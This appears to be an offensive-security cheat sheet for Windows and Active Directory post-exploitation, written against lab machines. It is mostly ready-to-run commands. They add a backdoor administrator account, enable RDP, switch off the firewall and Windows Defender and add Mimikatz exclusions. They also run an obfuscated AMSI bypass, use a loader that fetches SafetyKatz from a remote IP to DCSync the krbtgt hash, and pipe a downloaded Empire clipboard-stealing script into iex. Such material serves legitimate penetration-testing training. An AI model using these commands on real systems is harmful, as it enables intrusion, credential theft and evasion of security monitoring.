Post Exploitation
Active Directory Post Exploitation Checklists
RDP Stuff
Add Local Administrator
Create user asuka and add to RDP, Admin, and WinRM.
net user asuka 'TrYh@rdeR!' /add
net localgroup "Remote Desktop Users" asuka /add
net localgroup "Administrators" asuka /add
net localgroup "Remote Management Users" asuka /add
Enable RDP Access
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -
name "fDenyTSConnections" -value 0
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
# In case powershell is not enabled (like in old machine)
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
Access RDP
xfreerdp /dynamic-resolution +clipboard /cert:ignore /v:support.htb /u:asuka /p:'TrYh@rdeR!' +nego /drive:Tools,/home/asuka/Tools/ActiveDirectory/
rdesktop support.htb
# fix ERRCONNECT_TLS_CONNECT_FAILED
xfreerdp /dynamic-resolution +clipboard /cert:ignore /v:support.htb /u:asuka /p:'TrYh@rdeR!' +nego /drive:Tools,/home/asuka/Tools/ActiveDirectory/ /tls-seclevel:0
Defender and Firewall Stuff
Turn Off Firewall
# powershell
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
# cmd
netsh advfirewall set allprofiles state off
Disable Defender Real Time Monitoring
# Remove Defender Database
cmd /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Get-MpComputerStatus
Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -ExclusionExtension "ps1"
Set-MPPreference -DisableBehaviorMonitoring $true
# Disable AMSI (set to 0 to enable)
Set-MpPreference -DisableScriptScanning 1
# Check all exclusion folder
Get-MpPreference | Select-Object -Property ExclusionPath -ExpandProperty ExclusionPath
# Add folder exclusion (in case tamper protection is enabled)
Add-MpPreference -ExclusionPath C:\Mimikatz\
# Disable Real Time Protection
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
Bypassing PowerShell Security
Using InviShell - https://github.com/OmerYa/Invisi-Shell
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
AMSI Bypass
Detection: https://github.com/RythmStick/AMSITrigger
$a='si';$b='Am';$Ref=[Ref].Assembly.GetType(('System.Management.Automation.{0}{1}Utils'-f $b,$a)); $z=$Ref.GetField(('am{0}InitFailed'-f$a),'NonPublic,Static');$z.SetValue($null,$true)
OPSEC with Loader
C:\AD\Tools\Loader.exe -path http://172.16.100.67/SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit"
Get-ClipboardContents
Monitors the clipboard on a specified interval for changes to copied text.
iex (iwr -usebasicparsing https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/collection/Get-ClipboardContents.ps1);Get-ClipboardContents
WADComs
WADComs is an interactive cheat sheet, containing a curated list of offensive security tools and their respective commands, to be used against Windows/AD environments.
Dump Saved Password
Mimikatz
TCP Port Scanner
1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("172.16.8.1",$_)) "Port $_ is open!"} 2>$null # powershell
Ping Sweep
for /l %i in (1,1,254) do @ping -n 1 -w 100 172.16.8.%i > nul && echo 172.16.8.%i is up. # cmd
Inveigh
Responder, but in Powershell/C#
MDE Enum
How to extract Windows Defender Exclusions and Attack Surface Reduction (ASR) rules without Admin privileges
# local
mde-enum.exe /local /paths /access
# remote
mde-enum.exe <ip> <username> <password> <domain> /paths
# i.e
.\mde-enum.exe 172.16.8.148 asuka Asuka@1337 child.zerobyte.lab /paths

Or, use this Powershell script.
$logName = "Microsoft-Windows-Windows Defender/Operational"
$eventID = 5007
$events = Get-WinEvent -LogName $logName | Where-Object { $_.Id -eq $eventID }
$exclusionEvents = $events | Where-Object { $_.Message -match "Exclusions" }
$pattern = "HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\[^\s]+"
$exclusionEvents | ForEach-Object {
if ($_.Message -match $pattern) {
$matches[0]
}
}

Reference:
Other Useful Stuff
Last updated
Was this helpful?